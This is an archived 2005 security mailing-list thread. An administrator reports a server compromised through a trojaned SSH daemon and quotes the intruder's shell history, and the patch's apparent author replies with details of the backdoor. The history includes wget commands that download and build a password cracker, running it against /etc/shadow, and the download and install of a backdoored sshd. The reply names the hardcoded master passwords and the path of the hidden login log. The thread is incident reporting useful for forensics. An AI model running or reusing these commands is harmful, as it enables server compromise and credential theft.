Re: SSH compiled with backdoor

From: VeNoMouS (venom_at_gen-x.co.nz)
Date: 08/30/05

  • Next message: Javier Fernandez-Sanguino: "Re: SSH compiled with backdoor" 
    To: "milw0rm Inc." <milw0rm@gmail.com>
Date: Tue, 30 Aug 2005 15:17:48 +1200

    Hi Steve, i actually wrote that patch back in like *** 2001 or something it
    logs all ssh connection logins in plain to a txt file, it also puts a
    backdoor passwd into the ssh and wont show up in wtmp, making the user (what
    ever he logs in as ) invisible, so say u login with the username root and
    your use the global hidden passwd it will allow him on as root.

    looking at the code he users the following passwds for this global passwd.
    "toji" and "fv11r01rc3@l"

    the file that logs all the logins with time stamps and src ips is "dev/saux"

    Hope this helps you , if you require any further information email me back,
    been a few years since I even looked at this code.

    ---------- Forwarded message ----------
    From: steve@example.org <steve@example.org>
    Date: 27 Aug 2005 13:02:08 -0000
    Subject: SSH compiled with backdoor
    To: incidents@securityfocus.com

    Hi!

    One of my web servers was hacked on July 17, 2005. bash_history showed:

    w
    wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
    john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make
    linux-x86-any-elf;cd ../run;./john /etc/shadow
    wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
    -rf sshd.tar.gz;cd sshd;cd apps/ssh
    pico genx.h
    pico genx.h
    pico ssh2includes.h
    cd ../..
    ./configure --without-x
    make
    make install
    mkdir /lib/java
    cp /usr/sbin/sshd a
    mv a /lib/java
    rm -rf /usr/sbin/sshd
    cp /usr/local/sbin/sshd /usr/sbin
    /etc/rc.d/init.d/sshd restart
    /etc/rc.d/init.d/ssh restart
    locate init.d
    /etc/init.d/sshd restart
    w
    reboot

    According to john, a couple of users had weak passwords, but root
    seemed well protected. From looking in all the bash_history, it
    appears the hacker came in from the website account, and did an su
    from there.

    I found this about a month later when I logged into the box, did an
    ls, only to be met by a seg fault. A ps x showed mech.tgz trying to
    be downloaded, and a bunch of other CRON processes running. The auth
    log didn't show other logins, though, so the ssh installed must have
    logging turned off for the backdoor they installed.

    I filled out an abuse form at geocities for the accounts hosting the
    software after downloading the software (I couldn't find the tgz files
    on my system).

    Last showed:
    reboot system boot 2.4.18-bf2.4 Sun Jul 17 18:15 (37+11:47)
    website pts/0 193.231.77.74 Sun Jul 17 17:42 - down (00:27)
    website pts/1 193.231.77.74 Sun Jul 17 17:05 - 17:26 (00:20)
    website pts/0 211.43.207.169 Sun Jul 17 16:26 - 17:41 (01:14)

    whois says:
    inetnum: 193.231.77.0 - 193.231.77.255
    netname: DATANET-RO
    descr: Starnets - Datanet
    country: RO
    address: DATA NET
    address: Str. Ioan N. Roman Nr. 13
    address: Constanta, cod 900199, ROMANIA

    Best Regards,

    Steve

  • Next message: Javier Fernandez-Sanguino: "Re: SSH compiled with backdoor"
    Loading